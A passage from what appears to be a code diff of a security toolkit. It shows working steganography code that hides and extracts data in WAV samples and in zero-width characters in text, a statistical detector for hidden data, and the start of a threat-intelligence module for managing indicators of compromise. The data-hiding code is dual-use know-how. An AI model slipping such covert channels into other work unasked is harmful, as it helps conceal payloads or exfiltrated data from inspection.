"""Hide data in WAV audio using LSB of samples."""
|
||||
if not HAS_WAVE:
|
||||
return {'ok': False, 'error': 'wave module not available'}
|
||||
|
||||
try:
|
||||
with wave.open(audio_path, 'rb') as w:
|
||||
params = w.getparams()
|
||||
frames = w.readframes(w.getnframes())
|
||||
|
||||
payload = data
|
||||
if password:
|
||||
payload = _encrypt_data(data, password)
|
||||
|
||||
header = AudioStego.MAGIC + struct.pack('>I', len(payload))
|
||||
full_data = header + payload
|
||||
|
||||
bits = []
|
||||
for byte in full_data:
|
||||
for i in range(7, -1, -1):
|
||||
bits.append((byte >> i) & 1)
|
||||
|
||||
samples = list(frames)
|
||||
if len(bits) > len(samples):
|
||||
return {'ok': False, 'error': f'Data too large. Max: {len(samples) // 8} bytes'}
|
||||
|
||||
for i, bit in enumerate(bits):
|
||||
samples[i] = (samples[i] & 0xFE) | bit
|
||||
|
||||
with wave.open(output_path, 'wb') as w:
|
||||
w.setparams(params)
|
||||
w.writeframes(bytes(samples))
|
||||
|
||||
return {
|
||||
'ok': True, 'output': output_path,
|
||||
'hidden_bytes': len(payload),
|
||||
'encrypted': password is not None
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
@staticmethod
|
||||
def extract(audio_path: str, password: str = None) -> Dict:
|
||||
"""Extract hidden data from WAV audio."""
|
||||
if not HAS_WAVE:
|
||||
return {'ok': False, 'error': 'wave module not available'}
|
||||
|
||||
try:
|
||||
with wave.open(audio_path, 'rb') as w:
|
||||
frames = w.readframes(w.getnframes())
|
||||
|
||||
samples = list(frames)
|
||||
bits = [s & 1 for s in samples]
|
||||
|
||||
all_bytes = bytearray()
|
||||
for i in range(0, len(bits) - 7, 8):
|
||||
byte = 0
|
||||
for j in range(8):
|
||||
byte = (byte << 1) | bits[i + j]
|
||||
all_bytes.append(byte)
|
||||
|
||||
if all_bytes[:4] != AudioStego.MAGIC:
|
||||
return {'ok': False, 'error': 'No hidden data found'}
|
||||
|
||||
payload_len = struct.unpack('>I', bytes(all_bytes[4:8]))[0]
|
||||
payload = bytes(all_bytes[8:8 + payload_len])
|
||||
|
||||
if password:
|
||||
try:
|
||||
payload = _decrypt_data(payload, password)
|
||||
except Exception:
|
||||
return {'ok': False, 'error': 'Decryption failed'}
|
||||
|
||||
return {'ok': True, 'data': payload, 'size': len(payload)}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
|
||||
# ── Document Steganography ───────────────────────────────────────────────────
|
||||
|
||||
class DocumentStego:
|
||||
"""Whitespace and metadata steganography for text/documents."""
|
||||
|
||||
@staticmethod
|
||||
def hide_whitespace(text: str, data: bytes, password: str = None) -> Dict:
|
||||
"""Hide data using zero-width characters in text."""
|
||||
payload = data
|
||||
if password:
|
||||
payload = _encrypt_data(data, password)
|
||||
|
||||
# Zero-width characters
|
||||
ZWS = '\u200b' # zero-width space → 0
|
||||
ZWNJ = '\u200c' # zero-width non-joiner → 1
|
||||
ZWJ = '\u200d' # zero-width joiner → separator
|
||||
|
||||
# Convert payload to binary string
|
||||
bits = ''.join(f'{byte:08b}' for byte in payload)
|
||||
encoded = ''
|
||||
for bit in bits:
|
||||
encoded += ZWNJ if bit == '1' else ZWS
|
||||
|
||||
# Insert length prefix
|
||||
length_bits = f'{len(payload):032b}'
|
||||
length_encoded = ''
|
||||
for bit in length_bits:
|
||||
length_encoded += ZWNJ if bit == '1' else ZWS
|
||||
|
||||
hidden = length_encoded + ZWJ + encoded
|
||||
|
||||
# Insert after first line
|
||||
lines = text.split('\n', 1)
|
||||
if len(lines) > 1:
|
||||
result = lines[0] + hidden + '\n' + lines[1]
|
||||
else:
|
||||
result = text + hidden
|
||||
|
||||
return {
|
||||
'ok': True, 'text': result,
|
||||
'hidden_bytes': len(payload),
|
||||
'encrypted': password is not None
|
||||
}
|
||||
|
||||
@staticmethod
|
||||
def extract_whitespace(text: str, password: str = None) -> Dict:
|
||||
"""Extract data hidden in zero-width characters."""
|
||||
ZWS = '\u200b'
|
||||
ZWNJ = '\u200c'
|
||||
ZWJ = '\u200d'
|
||||
|
||||
# Find zero-width characters
|
||||
zw_chars = ''.join(c for c in text if c in (ZWS, ZWNJ, ZWJ))
|
||||
if ZWJ not in zw_chars:
|
||||
return {'ok': False, 'error': 'No hidden data found'}
|
||||
|
||||
length_part, data_part = zw_chars.split(ZWJ, 1)
|
||||
|
||||
# Decode length
|
||||
length_bits = ''.join('1' if c == ZWNJ else '0' for c in length_part)
|
||||
if len(length_bits) < 32:
|
||||
return {'ok': False, 'error': 'Corrupted header'}
|
||||
payload_len = int(length_bits[:32], 2)
|
||||
|
||||
# Decode data
|
||||
data_bits = ''.join('1' if c == ZWNJ else '0' for c in data_part)
|
||||
payload = bytearray()
|
||||
for i in range(0, min(len(data_bits), payload_len * 8), 8):
|
||||
if i + 8 <= len(data_bits):
|
||||
payload.append(int(data_bits[i:i+8], 2))
|
||||
|
||||
result_data = bytes(payload)
|
||||
if password:
|
||||
try:
|
||||
result_data = _decrypt_data(result_data, password)
|
||||
except Exception:
|
||||
return {'ok': False, 'error': 'Decryption failed'}
|
||||
|
||||
return {'ok': True, 'data': result_data, 'size': len(result_data)}
|
||||
|
||||
|
||||
# ── Detection / Analysis ────────────────────────────────────────────────────
|
||||
|
||||
class StegoDetector:
|
||||
"""Statistical analysis to detect hidden data in files."""
|
||||
|
||||
@staticmethod
|
||||
def analyze_image(image_path: str) -> Dict:
|
||||
"""Analyze image for signs of steganography."""
|
||||
if not HAS_PIL:
|
||||
return {'ok': False, 'error': 'Pillow (PIL) not installed'}
|
||||
|
||||
try:
|
||||
img = Image.open(image_path).convert('RGB')
|
||||
pixels = list(img.getdata())
|
||||
w, h = img.size
|
||||
|
||||
# Chi-square analysis on LSBs
|
||||
observed = [0, 0] # count of 0s and 1s in R channel LSBs
|
||||
for pixel in pixels:
|
||||
observed[pixel[0] & 1] += 1
|
||||
|
||||
total = sum(observed)
|
||||
expected = total / 2
|
||||
chi_sq = sum((o - expected) ** 2 / expected for o in observed)
|
||||
|
||||
# RS analysis (Regular-Singular groups)
|
||||
# Count pixel pairs where LSB flip changes smoothness
|
||||
regular = 0
|
||||
singular = 0
|
||||
for i in range(0, len(pixels) - 1, 2):
|
||||
p1, p2 = pixels[i][0], pixels[i+1][0]
|
||||
diff_orig = abs(p1 - p2)
|
||||
diff_flip = abs((p1 ^ 1) - p2)
|
||||
|
||||
if diff_flip > diff_orig:
|
||||
regular += 1
|
||||
elif diff_flip < diff_orig:
|
||||
singular += 1
|
||||
|
||||
total_pairs = regular + singular
|
||||
rs_ratio = regular / total_pairs if total_pairs > 0 else 0.5
|
||||
|
||||
# Check for ASTS magic in LSBs
|
||||
bits = []
|
||||
for pixel in pixels[:100]:
|
||||
for c in pixel:
|
||||
bits.append(c & 1)
|
||||
|
||||
header_bytes = bytearray()
|
||||
for i in range(0, min(32, len(bits)), 8):
|
||||
byte = 0
|
||||
for j in range(8):
|
||||
byte = (byte << 1) | bits[i + j]
|
||||
header_bytes.append(byte)
|
||||
|
||||
has_asts_magic = header_bytes[:4] == ImageStego.MAGIC
|
||||
|
||||
# Scoring
|
||||
score = 0
|
||||
indicators = []
|
||||
|
||||
if chi_sq < 1.0:
|
||||
score += 30
|
||||
indicators.append(f'LSB distribution very uniform (chi²={chi_sq:.2f})')
|
||||
elif chi_sq < 3.84:
|
||||
score += 15
|
||||
indicators.append(f'LSB distribution slightly uniform (chi²={chi_sq:.2f})')
|
||||
|
||||
if rs_ratio > 0.6:
|
||||
score += 25
|
||||
indicators.append(f'RS analysis suggests embedding (R/S={rs_ratio:.3f})')
|
||||
|
||||
if has_asts_magic:
|
||||
score += 50
|
||||
indicators.append('AUTARCH stego signature detected in LSB')
|
||||
|
||||
# Check file size vs expected
|
||||
file_size = os.path.getsize(image_path)
|
||||
expected_size = w * h * 3 # rough uncompressed estimate
|
||||
if file_size > expected_size * 0.9: # PNG should be smaller
|
||||
score += 10
|
||||
indicators.append('File larger than expected for format')
|
||||
|
||||
verdict = 'clean'
|
||||
if score >= 50:
|
||||
verdict = 'likely_stego'
|
||||
elif score >= 25:
|
||||
verdict = 'suspicious'
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'verdict': verdict,
|
||||
'confidence_score': min(100, score),
|
||||
'chi_square': round(chi_sq, 4),
|
||||
'rs_ratio': round(rs_ratio, 4),
|
||||
'has_magic': has_asts_magic,
|
||||
'indicators': indicators,
|
||||
'image_info': {'width': w, 'height': h, 'size': file_size}
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
@staticmethod
|
||||
def analyze_audio(audio_path: str) -> Dict:
|
||||
"""Analyze audio file for signs of steganography."""
|
||||
if not HAS_WAVE:
|
||||
return {'ok': False, 'error': 'wave module not available'}
|
||||
|
||||
try:
|
||||
with wave.open(audio_path, 'rb') as w:
|
||||
frames = w.readframes(min(w.getnframes(), 100000))
|
||||
params = w.getparams()
|
||||
|
||||
samples = list(frames)
|
||||
observed = [0, 0]
|
||||
for s in samples:
|
||||
observed[s & 1] += 1
|
||||
|
||||
total = sum(observed)
|
||||
expected = total / 2
|
||||
chi_sq = sum((o - expected) ** 2 / expected for o in observed)
|
||||
|
||||
# Check for magic
|
||||
bits = [s & 1 for s in samples[:100]]
|
||||
header_bytes = bytearray()
|
||||
for i in range(0, min(32, len(bits)), 8):
|
||||
byte = 0
|
||||
for j in range(8):
|
||||
byte = (byte << 1) | bits[i + j]
|
||||
header_bytes.append(byte)
|
||||
|
||||
has_magic = header_bytes[:4] == AudioStego.MAGIC
|
||||
|
||||
score = 0
|
||||
indicators = []
|
||||
if chi_sq < 1.0:
|
||||
score += 30
|
||||
indicators.append(f'LSB distribution uniform (chi²={chi_sq:.2f})')
|
||||
if has_magic:
|
||||
score += 50
|
||||
indicators.append('AUTARCH stego signature detected')
|
||||
|
||||
verdict = 'clean'
|
||||
if score >= 50:
|
||||
verdict = 'likely_stego'
|
||||
elif score >= 25:
|
||||
verdict = 'suspicious'
|
||||
|
||||
return {
|
||||
'ok': True, 'verdict': verdict,
|
||||
'confidence_score': min(100, score),
|
||||
'chi_square': round(chi_sq, 4),
|
||||
'has_magic': has_magic,
|
||||
'indicators': indicators,
|
||||
'audio_info': {
|
||||
'channels': params.nchannels,
|
||||
'framerate': params.framerate,
|
||||
'frames': params.nframes
|
||||
}
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
|
||||
# ── Steganography Manager ───────────────────────────────────────────────────
|
||||
|
||||
class StegoManager:
|
||||
"""Unified interface for all steganography operations."""
|
||||
|
||||
def __init__(self):
|
||||
self.data_dir = os.path.join(get_data_dir(), 'stego')
|
||||
os.makedirs(self.data_dir, exist_ok=True)
|
||||
self.image = ImageStego()
|
||||
self.audio = AudioStego()
|
||||
self.document = DocumentStego()
|
||||
self.detector = StegoDetector()
|
||||
|
||||
def get_capabilities(self) -> Dict:
|
||||
"""Check available steganography capabilities."""
|
||||
return {
|
||||
'image': HAS_PIL,
|
||||
'audio': HAS_WAVE,
|
||||
'document': True,
|
||||
'encryption': HAS_CRYPTO,
|
||||
'detection': HAS_PIL or HAS_WAVE
|
||||
}
|
||||
|
||||
def hide(self, carrier_path: str, data: bytes, output_path: str = None,
|
||||
password: str = None, carrier_type: str = None) -> Dict:
|
||||
"""Hide data in a carrier file (auto-detect type)."""
|
||||
if not carrier_type:
|
||||
ext = Path(carrier_path).suffix.lower()
|
||||
if ext in ('.png', '.bmp', '.tiff', '.tif'):
|
||||
carrier_type = 'image'
|
||||
elif ext in ('.wav', '.wave'):
|
||||
carrier_type = 'audio'
|
||||
else:
|
||||
return {'ok': False, 'error': f'Unsupported carrier format: {ext}'}
|
||||
|
||||
if not output_path:
|
||||
p = Path(carrier_path)
|
||||
output_path = str(p.parent / f'{p.stem}_stego{p.suffix}')
|
||||
|
||||
if carrier_type == 'image':
|
||||
return self.image.hide(carrier_path, data, output_path, password)
|
||||
elif carrier_type == 'audio':
|
||||
return self.audio.hide(carrier_path, data, output_path, password)
|
||||
|
||||
return {'ok': False, 'error': f'Unsupported type: {carrier_type}'}
|
||||
|
||||
def extract(self, carrier_path: str, password: str = None,
|
||||
carrier_type: str = None) -> Dict:
|
||||
"""Extract hidden data from carrier file."""
|
||||
if not carrier_type:
|
||||
ext = Path(carrier_path).suffix.lower()
|
||||
if ext in ('.png', '.bmp', '.tiff', '.tif'):
|
||||
carrier_type = 'image'
|
||||
elif ext in ('.wav', '.wave'):
|
||||
carrier_type = 'audio'
|
||||
|
||||
if carrier_type == 'image':
|
||||
return self.image.extract(carrier_path, password)
|
||||
elif carrier_type == 'audio':
|
||||
return self.audio.extract(carrier_path, password)
|
||||
|
||||
return {'ok': False, 'error': f'Unsupported type: {carrier_type}'}
|
||||
|
||||
def detect(self, file_path: str) -> Dict:
|
||||
"""Analyze file for steganographic content."""
|
||||
ext = Path(file_path).suffix.lower()
|
||||
if ext in ('.png', '.bmp', '.tiff', '.tif', '.jpg', '.jpeg'):
|
||||
return self.detector.analyze_image(file_path)
|
||||
elif ext in ('.wav', '.wave'):
|
||||
return self.detector.analyze_audio(file_path)
|
||||
return {'ok': False, 'error': f'Unsupported format for detection: {ext}'}
|
||||
|
||||
def capacity(self, file_path: str) -> Dict:
|
||||
"""Check capacity of a carrier file."""
|
||||
ext = Path(file_path).suffix.lower()
|
||||
if ext in ('.png', '.bmp', '.tiff', '.tif'):
|
||||
return self.image.capacity(file_path)
|
||||
elif ext in ('.wav', '.wave'):
|
||||
return self.audio.capacity(file_path)
|
||||
return {'ok': False, 'error': f'Unsupported format: {ext}'}
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
|
||||
def get_stego_manager() -> StegoManager:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
_instance = StegoManager()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI Interface ────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""CLI entry point for Steganography module."""
|
||||
mgr = get_stego_manager()
|
||||
|
||||
while True:
|
||||
caps = mgr.get_capabilities()
|
||||
print(f"\n{'='*60}")
|
||||
print(f" Steganography")
|
||||
print(f"{'='*60}")
|
||||
print(f" Image: {'OK' if caps['image'] else 'MISSING (pip install Pillow)'}")
|
||||
print(f" Audio: {'OK' if caps['audio'] else 'MISSING'}")
|
||||
print(f" Encryption: {'OK' if caps['encryption'] else 'MISSING (pip install pycryptodome)'}")
|
||||
print()
|
||||
print(" 1 — Hide Data in File")
|
||||
print(" 2 — Extract Data from File")
|
||||
print(" 3 — Detect Steganography")
|
||||
print(" 4 — Check Carrier Capacity")
|
||||
print(" 5 — Hide Text in Document (whitespace)")
|
||||
print(" 6 — Extract Text from Document")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" > ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
carrier = input(" Carrier file path: ").strip()
|
||||
message = input(" Message to hide: ").strip()
|
||||
output = input(" Output file path (blank=auto): ").strip() or None
|
||||
password = input(" Encryption password (blank=none): ").strip() or None
|
||||
if carrier and message:
|
||||
result = mgr.hide(carrier, message.encode(), output, password)
|
||||
if result['ok']:
|
||||
print(f" Success: {result.get('message', result.get('output'))}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '2':
|
||||
carrier = input(" Stego file path: ").strip()
|
||||
password = input(" Password (blank=none): ").strip() or None
|
||||
if carrier:
|
||||
result = mgr.extract(carrier, password)
|
||||
if result['ok']:
|
||||
try:
|
||||
text = result['data'].decode('utf-8')
|
||||
print(f" Extracted ({result['size']} bytes): {text}")
|
||||
except UnicodeDecodeError:
|
||||
print(f" Extracted {result['size']} bytes (binary data)")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '3':
|
||||
filepath = input(" File to analyze: ").strip()
|
||||
if filepath:
|
||||
result = mgr.detect(filepath)
|
||||
if result['ok']:
|
||||
print(f" Verdict: {result['verdict']} (score: {result['confidence_score']})")
|
||||
for ind in result.get('indicators', []):
|
||||
print(f" - {ind}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '4':
|
||||
filepath = input(" Carrier file: ").strip()
|
||||
if filepath:
|
||||
result = mgr.capacity(filepath)
|
||||
if result['ok']:
|
||||
kb = result['capacity_bytes'] / 1024
|
||||
print(f" Capacity: {result['capacity_bytes']} bytes ({kb:.1f} KB)")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '5':
|
||||
text = input(" Cover text: ").strip()
|
||||
message = input(" Hidden message: ").strip()
|
||||
password = input(" Password (blank=none): ").strip() or None
|
||||
if text and message:
|
||||
result = mgr.document.hide_whitespace(text, message.encode(), password)
|
||||
if result['ok']:
|
||||
print(f" Output text (copy this):")
|
||||
print(f" {result['text']}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '6':
|
||||
text = input(" Text with hidden data: ").strip()
|
||||
password = input(" Password (blank=none): ").strip() or None
|
||||
if text:
|
||||
result = mgr.document.extract_whitespace(text, password)
|
||||
if result['ok']:
|
||||
print(f" Hidden message: {result['data'].decode('utf-8', errors='replace')}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
716
modules/threat_intel.py
Normal file
716
modules/threat_intel.py
Normal file
@ -0,0 +1,716 @@
|
||||
"""AUTARCH Threat Intelligence Feed
|
||||
|
||||
IOC management, feed ingestion (STIX/TAXII, CSV, JSON), correlation with
|
||||
OSINT dossiers, reputation lookups, alerting, and blocklist generation.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Threat intelligence & IOC management"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "defense"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import hashlib
|
||||
import threading
|
||||
from pathlib import Path
|
||||
from datetime import datetime, timezone
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Dict, List, Optional, Any, Set
|
||||
from urllib.parse import urlparse
|
||||
|
||||
try:
|
||||
from core.paths import get_data_dir
|
||||
except ImportError:
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
try:
|
||||
import requests
|
||||
except ImportError:
|
||||
requests = None
|
||||
|
||||
|
||||
# ── Data Structures ──────────────────────────────────────────────────────────
|
||||
|
||||
IOC_TYPES = ['ip', 'domain', 'url', 'hash_md5', 'hash_sha1', 'hash_sha256', 'email', 'filename']
|
||||
|
||||
@dataclass
|
||||
class IOC:
|
||||
value: str
|
||||
ioc_type: str
|
||||
source: str = "manual"
|
||||
tags: List[str] = field(default_factory=list)
|
||||
severity: str = "unknown" # critical, high, medium, low, info, unknown
|
||||
first_seen: str = ""
|
||||
last_seen: str = ""
|
||||
description: str = ""
|
||||
reference: str = ""
|
||||
active: bool = True
|
||||
|
||||
def to_dict(self) -> Dict:
|
||||
return {
|
||||
'value': self.value, 'ioc_type': self.ioc_type,
|
||||
'source': self.source, 'tags': self.tags,
|
||||
'severity': self.severity, 'first_seen': self.first_seen,
|
||||
'last_seen': self.last_seen, 'description': self.description,
|
||||
'reference': self.reference, 'active': self.active,
|
||||
'id': hashlib.md5(f"{self.ioc_type}:{self.value}".encode()).hexdigest()[:12]
|
||||
}
|
||||
|
||||
@staticmethod
|
||||
def from_dict(d: Dict) -> 'IOC':
|
||||
return IOC(
|
||||
value=d['value'], ioc_type=d['ioc_type'],
|
||||
source=d.get('source', 'manual'), tags=d.get('tags', []),
|
||||
severity=d.get('severity', 'unknown'),
|
||||
first_seen=d.get('first_seen', ''), last_seen=d.get('last_seen', ''),
|
||||
description=d.get('description', ''), reference=d.get('reference', ''),
|
||||
active=d.get('active', True)
|
||||
)
|
||||
|
||||
@dataclass
|
||||
class Feed:
|
||||
name: str
|
||||
feed_type: str # taxii, csv_url, json_url, stix_file
|
||||
url: str = ""
|
||||
api_key: str = ""
|
||||
enabled: bool = True
|
||||
last_fetch: str = ""
|
||||
ioc_count: int = 0
|
||||
interval_hours: int = 24
|
||||
|
||||
def to_dict(self) -> Dict:
|
||||
return {
|
||||
'name': self.name, 'feed_type': self.feed_type,
|
||||
'url': self.url, 'api_key': self.api_key,
|
||||
'enabled': self.enabled, 'last_fetch': self.last_fetch,
|
||||
'ioc_count': self.ioc_count, 'interval_hours': self.interval_hours,
|
||||
'id': hashlib.md5(f"{self.name}:{self.url}".encode()).hexdigest()[:12]
|
||||
}
|
||||
|
||||
|
||||
# ── Threat Intel Engine ──────────────────────────────────────────────────────
|
||||
|
||||
class ThreatIntelEngine:
|
||||
"""IOC management and threat intelligence correlation."""
|
||||
|
||||
def __init__(self):
|
||||
self.data_dir = os.path.join(get_data_dir(), 'threat_intel')
|
||||
os.makedirs(self.data_dir, exist_ok=True)
|
||||
self.iocs: List[IOC] = []
|
||||
self.feeds: List[Feed] = []
|
||||
self.alerts: List[Dict] = []
|
||||
self._lock = threading.Lock()
|
||||
self._load()
|
||||
|
||||
def _load(self):
|
||||
"""Load IOCs and feeds from disk."""
|
||||
ioc_file = os.path.join(self.data_dir, 'iocs.json')
|
||||
if os.path.exists(ioc_file):
|
||||
try:
|
||||
with open(ioc_file) as f:
|
||||
data = json.load(f)
|
||||
self.iocs = [IOC.from_dict(d) for d in data]
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
feed_file = os.path.join(self.data_dir, 'feeds.json')
|
||||
if os.path.exists(feed_file):
|
||||
try:
|
||||
with open(feed_file) as f:
|
||||
data = json.load(f)
|
||||
self.feeds = [Feed(**d) for d in data]
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def _save_iocs(self):
|
||||
"""Persist IOCs to disk."""
|
||||
ioc_file = os.path.join(self.data_dir, 'iocs.json')
|
||||
with open(ioc_file, 'w') as f:
|
||||
json.dump([ioc.to_dict() for ioc in self.iocs], f, indent=2)
|
||||
|
||||
def _save_feeds(self):
|
||||
"""Persist feeds to disk."""
|
||||
feed_file = os.path.join(self.data_dir, 'feeds.json')
|
||||
with open(feed_file, 'w') as f:
|
||||
json.dump([feed.to_dict() for feed in self.feeds], f, indent=2)
|
||||
|
||||
# ── IOC Type Detection ───────────────────────────────────────────────
|
||||
|
||||
def detect_ioc_type(self, value: str) -> str:
|
||||
"""Auto-detect IOC type from value."""
|
||||
value = value.strip()
|
||||
# Hash detection
|
||||
if re.match(r'^[a-fA-F0-9]{32}$', value):
|
||||
return 'hash_md5'
|
||||
if re.match(r'^[a-fA-F0-9]{40}$', value):
|
||||
return 'hash_sha1'
|
||||
if re.match(r'^[a-fA-F0-9]{64}$', value):
|
||||
return 'hash_sha256'
|
||||
# URL
|
||||
if re.match(r'^https?://', value, re.I):
|
||||
return 'url'
|
||||
# Email
|
||||
if re.match(r'^[^@]+@[^@]+\.[^@]+$', value):
|
||||
return 'email'
|
||||
# IP (v4)
|
||||
if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', value):
|
||||
return 'ip'
|
||||
# Domain
|
||||
if re.match(r'^[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?)*\.[a-zA-Z]{2,}$', value):
|
||||
return 'domain'
|
||||
# Filename
|
||||
if '.' in value and '/' not in value and '\\' not in value:
|
||||
return 'filename'
|
||||
return 'unknown'
|
||||
|
||||
# ── IOC CRUD ─────────────────────────────────────────────────────────
|
||||
|
||||
def add_ioc(self, value: str, ioc_type: str = None, source: str = "manual",
|
||||
tags: List[str] = None, severity: str = "unknown",
|
||||
description: str = "", reference: str = "") -> Dict:
|
||||
"""Add a single IOC."""
|
||||
if not ioc_type:
|
||||
ioc_type = self.detect_ioc_type(value)
|
||||
|
||||
now = datetime.now(timezone.utc).isoformat()
|
||||
|
||||
# Check for duplicate
|
||||
with self._lock:
|
||||
for existing in self.iocs:
|
||||
if existing.value == value and existing.ioc_type == ioc_type:
|
||||
existing.last_seen = now
|
||||
if tags:
|
||||
existing.tags = list(set(existing.tags + tags))
|
||||
self._save_iocs()
|
||||
return {'ok': True, 'action': 'updated', 'ioc': existing.to_dict()}
|
||||
|
||||
ioc = IOC(
|
||||
value=value, ioc_type=ioc_type, source=source,
|
||||
tags=tags or [], severity=severity,
|
||||
first_seen=now, last_seen=now,
|
||||
description=description, reference=reference
|
||||
)
|
||||
self.iocs.append(ioc)
|
||||
self._save_iocs()
|
||||
|
||||
return {'ok': True, 'action': 'created', 'ioc': ioc.to_dict()}
|
||||
|
||||
def remove_ioc(self, ioc_id: str) -> Dict:
|
||||
"""Remove IOC by ID."""
|
||||
with self._lock:
|
||||
before = len(self.iocs)
|
||||
self.iocs = [
|
||||
ioc for ioc in self.iocs
|
||||
if hashlib.md5(f"{ioc.ioc_type}:{ioc.value}".encode()).hexdigest()[:12] != ioc_id
|
||||
]
|
||||
if len(self.iocs) < before:
|
||||
self._save_iocs()
|
||||
return {'ok': True}
|
||||
return {'ok': False, 'error': 'IOC not found'}
|
||||
|
||||
def get_iocs(self, ioc_type: str = None, source: str = None,
|
||||
severity: str = None, search: str = None,
|
||||
active_only: bool = True) -> List[Dict]:
|
||||
"""Query IOCs with filters."""
|
||||
results = []
|
||||
for ioc in self.iocs:
|
||||
if active_only and not ioc.active:
|
||||
continue
|
||||
if ioc_type and ioc.ioc_type != ioc_type:
|
||||
continue
|
||||
if source and ioc.source != source:
|
||||
continue
|
||||
if severity and ioc.severity != severity:
|
||||
continue
|
||||
if search and search.lower() not in ioc.value.lower() and \
|
||||
search.lower() not in ioc.description.lower() and \
|
||||
not any(search.lower() in t.lower() for t in ioc.tags):
|
||||
continue
|
||||
results.append(ioc.to_dict())
|
||||
return results
|
||||
|
||||
def bulk_import(self, text: str, source: str = "import",
|
||||
ioc_type: str = None) -> Dict:
|
||||
"""Import IOCs from newline-separated text."""
|
||||
imported = 0
|
||||
skipped = 0
|
||||
for line in text.strip().splitlines():
|
||||
line = line.strip()
|
||||
if not line or line.startswith('#'):
|
||||
continue
|
||||
# Handle CSV-style (value,type,severity,description)
|
||||
parts = [p.strip() for p in line.split(',')]
|
||||
value = parts[0]
|
||||
t = parts[1] if len(parts) > 1 and parts[1] in IOC_TYPES else ioc_type
|
||||
sev = parts[2] if len(parts) > 2 else 'unknown'
|
||||
desc = parts[3] if len(parts) > 3 else ''
|
||||
|
||||
if not value:
|
||||
skipped += 1
|
||||
continue
|
||||
|
||||
result = self.add_ioc(value=value, ioc_type=t, source=source,
|
||||
severity=sev, description=desc)
|
||||
if result['ok']:
|
||||
imported += 1
|
||||
else:
|
||||
skipped += 1
|
||||
|
||||
return {'ok': True, 'imported': imported, 'skipped': skipped}
|
||||
|
||||
def export_iocs(self, fmt: str = 'json', ioc_type: str = None) -> str:
|
||||
"""Export IOCs in specified format."""
|
||||
iocs = self.get_iocs(ioc_type=ioc_type, active_only=False)
|
||||
|
||||
if fmt == 'csv':
|
||||
lines = ['value,type,severity,source,tags,description']
|
||||
for ioc in iocs:
|
||||
tags = ';'.join(ioc.get('tags', []))
|
||||
lines.append(f"{ioc['value']},{ioc['ioc_type']},{ioc['severity']},"
|
||||
f"{ioc['source']},{tags},{ioc.get('description', '')}")
|
||||
return '\n'.join(lines)
|
||||
|
||||
elif fmt == 'stix':
|
||||
# Basic STIX 2.1 bundle
|
||||
objects = []
|
||||
for ioc in iocs:
|
||||
stix_type = {
|
||||
'ip': 'ipv4-addr', 'domain': 'domain-name',
|
||||
'url': 'url', 'email': 'email-addr',
|
||||
'hash_md5': 'file', 'hash_sha1': 'file', 'hash_sha256': 'file',
|
||||
'filename': 'file'
|
||||
}.get(ioc['ioc_type'], 'artifact')
|
||||
|
||||
if stix_type == 'file' and ioc['ioc_type'].startswith('hash_'):
|
||||
hash_algo = ioc['ioc_type'].replace('hash_', '').upper().replace('SHA', 'SHA-')
|
||||
obj = {
|
||||
'type': 'indicator',
|
||||
'id': f"indicator--{ioc['id']}",
|
||||
'name': ioc['value'],
|
||||
'pattern': f"[file:hashes.'{hash_algo}' = '{ioc['value']}']",
|
||||
'pattern_type': 'stix',
|
||||
'valid_from': ioc.get('first_seen', ''),
|
||||
'labels': ioc.get('tags', [])
|
||||
}
|
||||
else:
|
||||
obj = {
|
||||
'type': 'indicator',
|
||||
'id': f"indicator--{ioc['id']}",
|
||||
'name': ioc['value'],
|
||||
'pattern': f"[{stix_type}:value = '{ioc['value']}']",
|
||||
'pattern_type': 'stix',
|
||||
'valid_from': ioc.get('first_seen', ''),
|
||||
'labels': ioc.get('tags', [])
|
||||
}
|
||||
objects.append(obj)
|
||||
|
||||
bundle = {
|
||||
'type': 'bundle',
|
||||
'id': f'bundle--autarch-{int(time.time())}',
|
||||
'objects': objects
|
||||
}
|
||||
return json.dumps(bundle, indent=2)
|
||||
|
||||
else: # json
|
||||
return json.dumps(iocs, indent=2)
|
||||
|
||||
def get_stats(self) -> Dict:
|
||||
"""Get IOC database statistics."""
|
||||
by_type = {}
|
||||
by_severity = {}
|
||||
by_source = {}
|
||||
for ioc in self.iocs:
|
||||
by_type[ioc.ioc_type] = by_type.get(ioc.ioc_type, 0) + 1
|
||||
by_severity[ioc.severity] = by_severity.get(ioc.severity, 0) + 1
|
||||
by_source[ioc.source] = by_source.get(ioc.source, 0) + 1
|
||||
|
||||
return {
|
||||
'total': len(self.iocs),
|
||||
'active': sum(1 for i in self.iocs if i.active),
|
||||
'by_type': by_type,
|
||||
